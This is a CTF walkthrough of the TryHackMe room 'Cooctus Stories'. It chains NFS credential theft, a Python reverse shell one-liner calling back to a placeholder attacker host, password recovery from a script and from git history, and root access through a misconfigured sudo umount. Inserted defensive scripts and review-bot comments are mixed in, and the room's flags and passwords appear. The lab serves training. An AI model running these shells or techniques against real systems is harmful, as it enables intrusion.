Cooctus Stories (TryHackMe)


Cooctus Adventures is a TryHackMe challenge that follows the Overpass storyline, where an insider threat helped the Cooctus Clan compromise Overpass. The objective is to infiltrate their private server hidden in the Saharan Desert and uncover their plans. The box covers a range of techniques including NFS enumeration, web application exploitation via command injection, lateral movement across multiple users, code analysis, GPG decryption, git history forensics, and privilege escalation through a misconfigured mount. Each user on the box presents a unique challenge requiring a different approach, making this a solid machine for practising enumeration and chaining multiple attack vectors together.

The story so far...

Previously on Cooctus Tracker
Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the attack happened. (From Overpass 2 - Hacked by NinjaJc01)

Present times
Further investigation revealed that the hack was made possible by the help of an insider threat. Paradox helped the Cooctus Clan hack overpass in exchange for the secret shiba stash. Now, we have discovered a private server deep down under the boiling hot sands of the Saharan Desert. We suspect it is operated by the Clan and it's your objective to uncover their plans.

Note: A stable shell is recommended, so try and SSH into users when possible.

Answer the questions below

Paradox is nomming cookies

nmap -p- -sV IP_Address

PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
111/tcp   open  rpcbind  2-4 (RPC #100000)
2049/tcp  open  nfs_acl  3 (RPC #100227)
8080/tcp  open  http     Werkzeug httpd 0.14.1 (Python 3.6.9)
36987/tcp open  nlockmgr 1-4 (RPC #100021)
37235/tcp open  mountd   1-3 (RPC #100005)
47401/tcp open  mountd   1-3 (RPC #100005)
56577/tcp open  mountd   1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
gobuster dir -u http://IP_Address:8080 -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
          
/cat                  (Status: 302) [Size: 219] [--> http://IP_Address:8080/login]
/login                (Status: 200) [Size: 556]
Progress: 18456 / 18460 (99.98%)
curl http://IP_Address:8080/cat
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="/login">/login</a>.  If not click the link.
curl http://IP_Address:8080/login
<html>
	<head>
		<title>C.A.T login</title>
		<meta name="viewport" content="width=device-width, initial-scal=1.0">
		<link href="static/bootstrap.min.css" rel="stylesheet" media="screen">
	</head>
	<body>
		<div class="container">
			<h1>Cookieless login page</h1>
			<br>
			<form action="" method="post">
				<input type="text" placeholder="Username" name="username" value="">
				<input type="password" placeholder="Password" name="password" value="">
				<input class="btn btn-default" type="submit" value="Login">
			</form>
		</div>
	</body>
</html>
showmount -e IP_Address
Export list for IP_Address:
/var/nfs/general *

mkdir /tmp/nfs
mount -t nfs IP_Address:/var/nfs/general /tmp/nfs -o nolock

ls -la /tmp/nfs
total 80
drwxr-xr-x  2 nobody nogroup  4096 Nov 21  2020 .
drwxrwxrwt 20 root   root    69632 Mar 31 10:56 ..
-rw-r--r--  1 root   root       31 Nov 21  2020 credentials.bak
cat /tmp/nfs/credentials.bak
paradoxial.test
ShibaPretzel79
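The foothold here is an NFS export that any host can mount. The following is an added example, not part of the original write-up or the room, that audits an exports(5) file for exactly that kind of setting. The sample exports text is constructed, modelled on the `showmount -e` output above; the `/srv/...` lines and their hosts are invented for illustration.

```python
# Added example, not part of the original write-up: a small auditor for
# /etc/exports that flags the configuration behind the room's foothold,
# a share exported to '*' so any host can mount it and read credentials.bak.
import re
from dataclasses import dataclass

# Constructed sample, modelled on the write-up's 'showmount -e' output.
SAMPLE_EXPORTS = """\
# constructed sample exports file
/var/nfs/general *
/srv/build 10.0.0.0/24(rw,sync,no_subtree_check)
/srv/backup 10.0.0.5(rw,no_root_squash) *(ro)
"""

# '<host>(<opts>)' with both parts optional: '*', '10.0.0.5(rw)', '(rw)'.
CLIENT_RE = re.compile(r'([^(]*)(?:\((.*)\))?')


@dataclass
class Export:
    path: str
    host: str
    options: tuple


@dataclass
class Finding:
    path: str
    host: str
    reason: str


def parse_exports(text):
    """Parse exports(5) lines: '<path> <client>(<opts>) [<client>(<opts>) ...]'.
    A client token with no host part, such as '(rw)', is treated as '*',
    which is how exportfs handles it (it only prints a warning)."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for client in clients:
            m = CLIENT_RE.fullmatch(client)
            host = m.group(1) or "*"
            opts = tuple(o for o in (m.group(2) or "").split(",") if o)
            exports.append(Export(path, host, opts))
    return exports


def audit_exports(text):
    """Return a Finding for every export that weakens the default protections.
    The defaults are ro, root_squash and secure; a read-only share exported
    to '*' is still a leak when the directory holds files like credentials.bak."""
    findings = []
    for e in parse_exports(text):
        if e.host == "*":
            findings.append(Finding(e.path, e.host, "exported to every host"))
        if "no_root_squash" in e.options:
            findings.append(Finding(e.path, e.host,
                                    "no_root_squash: remote root keeps uid 0 on the share"))
        if "insecure" in e.options:
            findings.append(Finding(e.path, e.host,
                                    "insecure: unprivileged client source ports accepted"))
        if "rw" in e.options and e.host == "*":
            findings.append(Finding(e.path, e.host, "world-writable export"))
    return findings


if __name__ == "__main__":
    for f in audit_exports(SAMPLE_EXPORTS):
        print(f"{f.path} [{f.host}]: {f.reason}")
```

Run it against a real file with `audit_exports(open("/etc/exports").read())`; the room's `/var/nfs/general *` line produces a single "exported to every host" finding, which is enough for an attacker to mount the share with the `mount -t nfs` command shown above.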
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKBOX_IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

nc -lvnp 4444

nc -nlvp 4444
Listening on 0.0.0.0 4444
Connection received on IP_Address 34264
bash: cannot set terminal process group (783): Inappropriate ioctl for device
bash: no job control in this shell
paradox@cchq:~$ ls -la
total 36
drwxr-xr-x 5 paradox paradox 4096 Feb 22  2021 .
drwxr-xr-x 6 root    root    4096 Jan  2  2021 ..
lrwxrwxrwx 1 paradox paradox    9 Feb 20  2021 .bash_history -> /dev/null
-rw-r--r-- 1 paradox paradox  220 Jan  2  2021 .bash_logout
-rw-r--r-- 1 paradox paradox 3882 Feb 20  2021 .bashrc
drwx------ 2 paradox paradox 4096 Jan  2  2021 .cache
drwxr-xr-x 4 paradox paradox 4096 Jan  1  2021 CATapp
drwx------ 3 paradox paradox 4096 Jan  2  2021 .gnupg
-rw-r--r-- 1 paradox paradox  807 Jan  2  2021 .profile
-rw------- 1 paradox paradox   38 Feb 20  2021 user.txt
paradox@cchq:~$ cat user.txt
THM{2dccd1ab3e03990aea77359831c85ca2}

Find out what Szymex is working on

sudo -l
sudo: no tty present and no askpass program specified
paradox@cchq:~$ cat /etc/passwd | grep -v nologin | grep -v false
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
tux:x:1000:1000:tux:/home/tux:/bin/bash
szymex:x:1001:1001::/home/szymex:/bin/bash
varg:x:1002:1002::/home/varg:/bin/bash
paradox:x:1003:1003::/home/paradox:/bin/bash
paradox@cchq:~$ pwd
/home/paradox
paradox@cchq:~$ cd ../
paradox@cchq:/home$ ls 
paradox
szymex
tux
varg

paradox@cchq:/home$ cd szymex
paradox@cchq:/home/szymex$ ls -la
total 44
drwxr-xr-x 5 szymex szymex 4096 Feb 22  2021 .
drwxr-xr-x 6 root   root   4096 Jan  2  2021 ..
lrwxrwxrwx 1 szymex szymex    9 Feb 20  2021 .bash_history -> /dev/null
-rw-r--r-- 1 szymex szymex  220 Jan  2  2021 .bash_logout
-rw-r--r-- 1 szymex szymex 3865 Feb 20  2021 .bashrc
drwx------ 2 szymex szymex 4096 Jan  2  2021 .cache
drwx------ 3 szymex szymex 4096 Jan  2  2021 .gnupg
drwxrwxr-x 3 szymex szymex 4096 Jan  2  2021 .local
-r-------- 1 szymex szymex   11 Jan  2  2021 mysupersecretpassword.cat
-rw-rw-r-- 1 szymex szymex  316 Feb 20  2021 note_to_para
-rwxrwxr-- 1 szymex szymex  735 Feb 20  2021 SniffingCat.py
-rw------- 1 szymex szymex   38 Feb 22  2021 user.txt

paradox@cchq:/home/szymex$ cat user.txt
cat: user.txt: Permission denied
paradox@cchq:/home/szymex$ cat note_to_para
Paradox,

I'm testing my new Dr. Pepper Tracker script. 
It detects the location of shipments in real time and sends the coordinates to your account.
If you find this annoying you need to change my super secret password file to disable the tracker.

You know me, so you know how to get access to the file.

- Szymex
cat SniffingCat.py
#!/usr/bin/python3
import os
import random

def encode(pwd):
    enc = ''
    for i in pwd:
        if ord(i) > 110:
            num = (13 - (122 - ord(i))) + 96
            enc += chr(num)
        else:
            enc += chr(ord(i) + 13)
    return enc


x = random.randint(300,700)
y = random.randint(0,255)
z = random.randint(0,1000)

message = "Approximate location of an upcoming Dr.Pepper shipment found:"
coords = "Coordinates: X: {x}, Y: {y}, Z: {z}".format(x=x, y=y, z=z)

with open('/home/szymex/mysupersecretpassword.cat', 'r') as f:
    line = f.readline().rstrip("\n")
    enc_pw = encode(line)
    if enc_pw == "pureelpbxr":
        os.system("wall -g paradox " + message)
        os.system("wall -g paradox " + coords)
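SniffingCat.py never prints the password: it reads `mysupersecretpassword.cat` (which paradox cannot read), encodes it and compares the result with the hard-coded `"pureelpbxr"`. The encoding is invertible, so the check itself gives the password away. The following is an added example, not part of the original write-up or of SniffingCat.py, that derives the inverse from the `encode()` arithmetic and recovers the only plaintext that passes the check; `encode()` is re-implemented here only for the round-trip verification.

```python
# Added example, not part of the original write-up or of SniffingCat.py.
import codecs

TARGET = "pureelpbxr"  # the comparison value hard-coded in SniffingCat.py


def encode(pwd):
    """Same arithmetic as SniffingCat.py. For ord(c) > 110 the expression
    (13 - (122 - ord(c))) + 96 simplifies to ord(c) - 13; otherwise ord(c) + 13."""
    return "".join(chr(ord(c) - 13) if ord(c) > 110 else chr(ord(c) + 13) for c in pwd)


def decode(enc):
    """Inverse of encode(). Plaintext bytes <= 110 land in 110..123 after +13,
    plaintext bytes > 110 land in 98..109 after -13. The two output ranges do
    not overlap, so the direction of the shift can be read off each byte."""
    return "".join(chr(ord(c) - 13) if ord(c) >= 110 else chr(ord(c) + 13) for c in enc)


def recover_password():
    """The plaintext SniffingCat.py accepts, verified by encoding it again."""
    pw = decode(TARGET)
    if encode(pw) != TARGET:
        raise ValueError("decode() is not the inverse of encode() for this input")
    return pw


def letters_where_not_rot13():
    """The encoding is almost ROT13 on lowercase letters; this lists the
    exceptions (ROT13 maps 'n' to 'a', encode() maps it to '{')."""
    return [c for c in "abcdefghijklmnopqrstuvwxyz"
            if encode(c) != codecs.encode(c, "rot13")]


if __name__ == "__main__":
    print("password:", recover_password())
    print("not ROT13 on:", letters_where_not_rot13())
```

Because the scheme is ROT13 on every lowercase letter except `n`, `codecs.decode("pureelpbxr", "rot13")` would also have worked here, but the inverse above is the safe choice: it reverses exactly what the script does, so it also handles a password containing `n` (encoded as `{`), where ROT13 would give the wrong answer.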
python3 -c 'import pty; pty.spawn("/bin/bash")'
paradox@cchq:/home/szymex$ su szymex
Password: cherrycoke

szymex@cchq:~$ cat user.txt
THM{c89f9f4ef264e22001f9a9c3d72992ef}

Find out what Tux is working on

cat note_to_every_cooctus
Hello fellow Cooctus Clan members

I'm proposing my idea to dedicate a portion of the cooctus fund for the construction of a penguin army.

The 1st Tuxling Infantry will provide young and brave penguins with opportunities to
explore the world while making sure our control over every continent spreads accordingly.

Potential candidates will be chosen from a select few who successfully complete all 3 Tuxling Trials.
Work on the challenges is already underway thanks to the trio of my top-most explorers.

Required budget: 2,348,123 Doge coins and 47 pennies.

Hope this message finds all of you well and spiky.

- TuxTheXplorer
cat note
Noot noot! You found me. 
I'm Mr. Skipper and this is my challenge for you.

General Tux has bestowed the first fragment of his secret key to me.
If you crack my NootCode you get a point on the Tuxling leaderboards and you'll find my key fragment.

Good luck and keep on nooting!

PS: You can compile the source code with gcc
cat nootcode.c
#include <stdio.h>

#define noot int
#define Noot main
#define nOot return
#define noOt (
#define nooT )
#define NOOOT "f96"
#define NooT ;
#define Nooot nuut
#define NOot {
#define nooot key
#define NoOt }
#define NOOt void
#define NOOT "NOOT!\n"
#define nooOT "050a"
#define noOT printf
#define nOOT 0
#define nOoOoT "What does the penguin say?\n"
#define nout "d61"

noot Noot noOt nooT NOot
    noOT noOt nOoOoT nooT NooT
    Nooot noOt nooT NooT

    nOot nOOT NooT
NoOt

NOOt nooot noOt nooT NOot
    noOT noOt NOOOT nooOT nout nooT NooT
NoOt

NOOt Nooot noOt nooT NOot
    noOT noOt NOOT nooT NooT
NoOt
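The "NootCode" is ordinary C hidden behind object-like macros, so the fastest route is to let the preprocessor undo them (`gcc -E nootcode.c`) and read `key()`. The following is an added example, not part of the original write-up or of the room, that performs the same substitution in Python and then joins the adjacent string literals inside `key()`, which the C compiler would concatenate into the first key fragment. The C source is embedded as shown above so the script runs offline.

```python
# Added example, not part of the original write-up or of the room's nootcode.c.
import re

# nootcode.c as shown in the write-up, embedded so the script runs offline.
NOOTCODE = r'''#include <stdio.h>

#define noot int
#define Noot main
#define nOot return
#define noOt (
#define nooT )
#define NOOOT "f96"
#define NooT ;
#define Nooot nuut
#define NOot {
#define nooot key
#define NoOt }
#define NOOt void
#define NOOT "NOOT!\n"
#define nooOT "050a"
#define noOT printf
#define nOOT 0
#define nOoOoT "What does the penguin say?\n"
#define nout "d61"

noot Noot noOt nooT NOot
    noOT noOt nOoOoT nooT NooT
    Nooot noOt nooT NooT

    nOot nOOT NooT
NoOt

NOOt nooot noOt nooT NOot
    noOT noOt NOOOT nooOT nout nooT NooT
NoOt

NOOt Nooot noOt nooT NOot
    noOT noOt NOOT nooT NooT
NoOt
'''

DEFINE_RE = re.compile(r'\s*#define\s+(\w+)\s+(.*?)\s*$')
# One token at a time: a string literal (left alone) or an identifier.
TOKEN_RE = re.compile(r'"(?:[^"\\]|\\.)*"|\b\w+\b')


def parse_defines(src):
    """Split the source into its object-like macro table and the remaining body."""
    defines, body = {}, []
    for line in src.splitlines():
        m = DEFINE_RE.match(line)
        if m:
            defines[m.group(1)] = m.group(2)
        else:
            body.append(line)
    return defines, "\n".join(body)


def expand(src):
    """Replace every whole-identifier occurrence of a macro name with its body.
    Names are case-sensitive (noot, Noot and nOot are three different macros),
    so substitution happens on exact tokens, never on substrings. A real
    preprocessor rescans the result; none of these macros expands to another
    macro name, so one pass is enough here."""
    defines, body = parse_defines(src)

    def replace(m):
        tok = m.group(0)
        return tok if tok.startswith('"') else defines.get(tok, tok)

    return TOKEN_RE.sub(replace, body)


def string_literals_in(expanded, func_name):
    """Concatenate the string literals inside the body of func_name, mirroring
    C's adjacent-literal concatenation of "f96" "050a" "d61"."""
    pat = re.compile(r'\b' + re.escape(func_name) + r'\s*\(\s*\)\s*\{(.*?)\}', re.S)
    m = pat.search(expanded)
    if not m:
        return None
    return "".join(re.findall(r'"((?:[^"\\]|\\.)*)"', m.group(1)))


def fragment_1():
    """Fragment 1 of General Tux's key: what key() would print once expanded."""
    return string_literals_in(expand(NOOTCODE), "key")


if __name__ == "__main__":
    print(expand(NOOTCODE))
    print("Fragment 1:", fragment_1())
```

Note that `key()` is never called from `main()`, so compiling and running the program only prints "NOOT!"; the fragment is only visible in the expanded source, which is why reading the output of the preprocessor beats running the binary here.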
cat /etc/group | grep testers
testers:x:1004:tux,szymex
find / -name "tuxling*" -type d 2>/dev/null
/home/tux/tuxling_3
/home/tux/tuxling_1
/media/tuxling_2
szymex@cchq:~$ ls -la /home/tux/tuxling_3
total 12
drwxrwx--- 2 tux testers 4096 Feb 20  2021 .
drwxr-xr-x 9 tux tux     4096 Feb 20  2021 ..
-rwxrwx--- 1 tux testers  178 Feb 20  2021 note
szymex@cchq:~$ ls -la /media/tuxling_2
total 20
drwxrwx--- 2 tux  testers 4096 Feb 20  2021 .
drwxr-xr-x 3 root root    4096 Feb 20  2021 ..
-rw-rw-r-- 1 tux  testers  740 Feb 20  2021 fragment.asc
-rw-rw---- 1 tux  testers  280 Jan  2  2021 note
-rw-rw-r-- 1 tux  testers 3670 Feb 20  2021 private.key
szymex@cchq:~$ cat /home/tux/tuxling_3/note
Hi! Kowalski here. 
I was practicing my act of disappearance so good job finding me.

Here take this,
The last fragment is: 637b56db1552

Combine them all and visit the station.
szymex@cchq:~$ cat /media/tuxling_2/note
Noot noot! You found me. 
I'm Rico and this is my challenge for you.

General Tux handed me a fragment of his secret key for safekeeping.
I've encrypted it with Penguin Grade Protection (PGP).

You can have the key fragment if you can decrypt it.

Good luck and keep on nooting!

szymex@cchq:~$ cat /media/tuxling_2/fragment.asc
-----BEGIN PGP MESSAGE-----
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=GDIs
-----END PGP MESSAGE-----
  • Fragment 1 (tuxling_1): f96050ad61

  • Fragment 2 (tuxling_2): decrypt to find out

  • Fragment 3 (tuxling_3): 637b56db1552

szymex@cchq:~$ gpg --import /media/tuxling_2/private.key
gpg: key B70EB31F8EF3187C: public key "TuxPingu" imported
gpg: key B70EB31F8EF3187C: secret key imported
gpg: Total number processed: 1
gpg:               imported: 1
gpg:       secret keys read: 1
gpg:   secret keys imported: 1
szymex@cchq:~$ gpg --decrypt /media/tuxling_2/fragment.asc
gpg: Note: secret key 97D48EB17511A6FA expired at Mon 20 Feb 2023 07:58:30 PM UTC
gpg: encrypted with 3072-bit RSA key, ID 97D48EB17511A6FA, created 2021-02-20
      "TuxPingu"
The second key fragment is: 6eaf62818d

All three fragments collected:

  • Fragment 1: f96050ad61

  • Fragment 2: 6eaf62818d

  • Fragment 3: 637b56db1552

Combined: f96050ad616eaf62818d637b56db1552

ssh tux@IP_Address
cat user.txt
THM{592d07d6c2b7b3b3e7dc36ea2edbd6f1}

Find out what Varg is working on


tux@cchq:/home/varg/cooctOS_src$ cat /etc/group | grep os_tester
os_tester:x:1005:tux,varg
tux@cchq:/home/varg/cooctOS_src$ git log --oneline
8b8daa4 (HEAD -> master) Removed CooctOS login script for now
6919df5 Created git repo for CooctOS
tux@cchq:/home/varg/cooctOS_src$ git show HEAD
commit 8b8daa41120535c569d0b99c6859a1699227d086 (HEAD -> master)
Author: Vargles <varg@cchq.noot>
Date:   Sat Feb 20 15:47:21 2021 +0000

    Removed CooctOS login script for now

diff --git a/bin/CooctOS.py b/bin/CooctOS.py
deleted file mode 100755
index 4ccfcc1..0000000
--- a/bin/CooctOS.py
+++ /dev/null
@@ -1,52 +0,0 @@
git show 6919df5
commit 6919df5c171460507f69769bc20e19bd0838b74d
Author: Vargles <varg@cchq.noot>
Date:   Sat Feb 20 15:46:28 2021 +0000

    Created git repo for CooctOS

diff --git a/bin/CooctOS.py b/bin/CooctOS.py
new file mode 100755
index 0000000..4ccfcc1
--- /dev/null
+++ b/bin/CooctOS.py
@@ -0,0 +1,52 @@
+#!/usr/bin/python3
+
+import time
+import os;
+import pty;
+
+#print(chr(27)+ "[2J")
+logo = """\033[1;30;49m
+ \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \033[1;37;49m\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\033[1;30;49m
+\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2588\u2588\u2554\u2550\u2550\u255d\033[1;37;49m\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\033[1;30;49m
+\u2588\u2588\u2551     \u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551        \u2588\u2588\u2551   \033[1;37;49m\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\033[1;30;49m
+\u2588\u2588\u2551     \u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551        \u2588\u2588\u2551   \033[1;37;49m\u2588\u2588\u2551   \u2588\u2588\u2551\u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\033[1;30;49m
+\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2557   \u2588\u2588\u2551   \033[1;37;49m\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\033[1;30;49m
+ \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d  \u255a\u2550\u2550\u2550\u2550\u2550\u255d  \u255a\u2550\u2550\u2550\u2550\u2550\u255d   \u255a\u2550\u255d    \033[1;37;49m\u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\033[1;30;49m
+"""
+print(logo)
+print("                       LOADING")
+print("[", end='')
+
+for i in range(0,60):
+    #print(chr(27)+ "[2J")
+    #print(logo)
+    #print("                       LOADING")
+    print("[", end='')
+    print("=" * i, end='')
+    print("]")
+    time.sleep(0.02)
+    print("\033[A\033[A")
+
+print("\032")
+print("\033[0;0m[ \033[92m OK  \033[0;0m] Cold boot detected. Flux Capacitor powered up")
+
+print("\033[0;0m[ \033[92m OK  \033[0;0m] Mounted Cooctus Filesystem under /opt")
+
+print("\033[0;0m[ \033[92m OK  \033[0;0m] Finished booting sequence")
+
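Review bot: the imports `import os;` and `import pty;` carry trailing semicolons, which Python accepts but linters flag (E703); drop them. The commented-out `print(chr(27)+ "[2J")`, `print(logo)` and `print("                       LOADING")` lines inside the loop are dead code and should be removed rather than carried in the file, and `print("\032")` writes a raw SUB control byte (0x1A) to the terminal, which is almost certainly not the intended screen-clear.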
git show 6919df5 | tail -20
+  clear();
+  printRoom(rum);
+
+  gotoxy(0,13);
+  tcsetattr( STDIN_FILENO, TCSANOW, &oldt); //restoring original terminal configuration
+  clear();
+  return 0;
+}
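Review bot: the terminal restore `tcsetattr( STDIN_FILENO, TCSANOW, &oldt);` only runs on the normal return path at the end of main(); if the game is interrupted (SIGINT) or exits early, the user's terminal is left in the modified mode. Register the restore with atexit() or a signal handler as well, so the original settings come back on every exit path.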
diff --git a/games/note b/games/note
new file mode 100644
index 0000000..00e6388
--- /dev/null
+++ b/games/note
@@ -0,0 +1,6 @@
+Hey Varg! 
+
+I've created a little game called Adventure. 
+If you like it, we could ship it with the OS when it's ready :)
+
+- Tux
git show 6919df5 | grep -A 5 -i "password\|username\|login\|varg"
Author: Vargles <varg@cchq.noot>
Date:   Sat Feb 20 15:46:28 2021 +0000

    Created git repo for CooctOS

diff --git a/bin/CooctOS.py b/bin/CooctOS.py
--
+uname = input("\ncookie login: ")
+pw = input("Password: ")
+
+for i in range(0,2):
+    if pw != "slowroastpork":
+        pw = input("Password: ")
+    else:
+        if uname == "varg":
+            os.setuid(1002)
+            os.setgid(1002)
+            pty.spawn("/bin/rbash")
+            break
+        else:
+            print("Login Failed")
+            break
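Review bot: `if pw != "slowroastpork":` embeds the login credential in the source, where it survives in git history even after the file is deleted (as the later commit "Removed CooctOS login script for now" shows). Store a hash or delegate the check to the system (PAM/`su`) instead, and read the secret with `getpass.getpass()` rather than `input("Password: ")`, which echoes it to the terminal. `os.setuid(1002)` also hard-codes varg's uid; look it up with `pwd.getpwnam("varg")` so the script does not silently switch to the wrong account if uids change.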
diff --git a/boot/grub/default b/boot/grub/default
new file mode 100644
index 0000000..e69de29
diff --git a/boot/grub/gfxblacklist.txt b/boot/grub/gfxblacklist.txt
--
+Hey Varg! 
+
+I've created a little game called Adventure. 
+If you like it, we could ship it with the OS when it's ready :)
+
+- Tux
su varg
Password: slowroastpork

cat user.txt
THM{3a33063a4a8a5805d17aa411a53286e6}
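Varg's password was recovered by reading a deleted file back out of git history. The following is an added example, not part of the original write-up, of the complementary defensive check: a scanner over `git show` or `git log -p` output that flags added lines carrying credential comparisons or hard-coded privilege switches. `SAMPLE_DIFF` is constructed from the diff lines shown above (line numbers and the second file's hunk header are assumed for the sample).

```python
# Added example, not part of the original write-up: scan unified-diff output
# for the pattern that exposed varg's password in commit 6919df5.
import re
import sys

# Constructed sample, assembled from the diff lines shown in the write-up.
SAMPLE_DIFF = """\
diff --git a/bin/CooctOS.py b/bin/CooctOS.py
new file mode 100755
--- /dev/null
+++ b/bin/CooctOS.py
@@ -0,0 +1,52 @@
+#!/usr/bin/python3
+import os
+uname = input("cookie login: ")
+pw = input("Password: ")
+for i in range(0,2):
+    if pw != "slowroastpork":
+        pw = input("Password: ")
+    else:
+        if uname == "varg":
+            os.setuid(1002)
diff --git a/games/note b/games/note
new file mode 100644
--- /dev/null
+++ b/games/note
@@ -0,0 +1,6 @@
+Hey Varg!
+I've created a little game called Adventure.
"""

RULES = [
    # A credential-looking variable compared with, or assigned, a string literal.
    (re.compile(r'\b(pw|pwd|passwd|password|secret|token|api_key)\b'
                r'\s*(?:==|!=|=)\s*["\'][^"\']{4,}["\']', re.I),
     "credential compared with or assigned a string literal"),
    # setuid(1002)-style switches to a numeric uid/gid.
    (re.compile(r'\bset(?:e?uid|e?gid)\s*\(\s*\d+\s*\)'),
     "hard-coded uid/gid switch"),
]

HUNK_RE = re.compile(r'^@@ -\d+(?:,\d+)? \+(\d+)(?:,\d+)? @@')


def scan_diff(diff_text):
    """Walk unified-diff output, tracking the current file and the new-side
    line number, and apply RULES to added ('+') lines only.
    Returns (path, line_number, reason, line_text) tuples."""
    findings = []
    path, lineno = None, 0
    for raw in diff_text.splitlines():
        if raw.startswith("+++ "):
            path = raw[4:]
            path = path[2:] if path.startswith("b/") else path
        elif raw.startswith("--- "):
            pass
        elif HUNK_RE.match(raw):
            lineno = int(HUNK_RE.match(raw).group(1))
        elif raw.startswith("+"):
            added = raw[1:]
            for pattern, reason in RULES:
                if pattern.search(added):
                    findings.append((path, lineno, reason, added.strip()))
            lineno += 1
        elif raw.startswith(" "):
            lineno += 1  # context line: present on the new side too
        # '-' lines belong to the old side and do not advance lineno
    return findings


if __name__ == "__main__":
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_DIFF
    for path, lineno, reason, line in scan_diff(text):
        print(f"{path}:{lineno}: {reason}: {line}")
```

Pipe a whole history through it with `git log -p --all | python3 scan_diff.py`: because it only looks at `+` lines and tracks the new-side line numbers from each `@@` header, it reports where a secret was introduced, which is the commit to rewrite or rotate credentials for, even when a later commit deleted the file.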

Get full root privileges

sudo -l
Matching Defaults entries for varg on cchq:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User varg may run the following commands on cchq:
    (root) NOPASSWD: /bin/umount
varg@cchq:~$ mount | grep -v "tmpfs\|cgroup\|proc\|sys\|dev"
sunrpc on /run/rpc_pipefs type rpc_pipefs (rw,relatime)
varg@cchq:~$ find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/home/varg/CooctOS.py
/bin/ping
/bin/mount
/bin/su
/bin/umount
/bin/fusermount
/sbin/mount.nfs
ls -la /opt
total 12
drwxr-xr-x  3 root root      4096 Feb 20  2021 .
drwxr-xr-x 24 root root      4096 Feb 20  2021 ..
drwxrwx--- 11 varg os_tester 4096 Feb 20  2021 CooctFS
sudo /bin/umount /opt/CooctFS
ls -la /opt/CooctFS
total 12
drwxr-xr-x 3 root root 4096 Feb 20  2021 .
drwxr-xr-x 3 root root 4096 Feb 20  2021 ..
drwxr-xr-x 5 root root 4096 Feb 20  2021 root
varg@cchq:~$ ls -la /opt/CooctFS/root
total 28
drwxr-xr-x 5 root root 4096 Feb 20  2021 .
drwxr-xr-x 3 root root 4096 Feb 20  2021 ..
lrwxrwxrwx 1 root root    9 Feb 20  2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Feb 20  2021 .bashrc
drwx------ 3 root root 4096 Feb 20  2021 .cache
drwxr-xr-x 3 root root 4096 Feb 20  2021 .local
-rw-r--r-- 1 root root   43 Feb 20  2021 root.txt
drwxr-xr-x 2 root root 4096 Feb 20  2021 .ssh
varg@cchq:~$ cat /opt/CooctFS/root/root.txt
hmmm...
No flag here. You aren't root yet.


ls -la /opt/CooctFS/root/.ssh
total 16
drwxr-xr-x 2 root root 4096 Feb 20  2021 .
drwxr-xr-x 5 root root 4096 Feb 20  2021 ..
-rw-r--r-- 1 root root 1679 Feb 20  2021 id_rsa
-rw-r--r-- 1 root root  391 Feb 20  2021 id_rsa.pub
cat /opt/CooctFS/root/.ssh/id_rsa


echo "-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----" > /tmp/root_rsa

chmod 600 /tmp/root_rsa
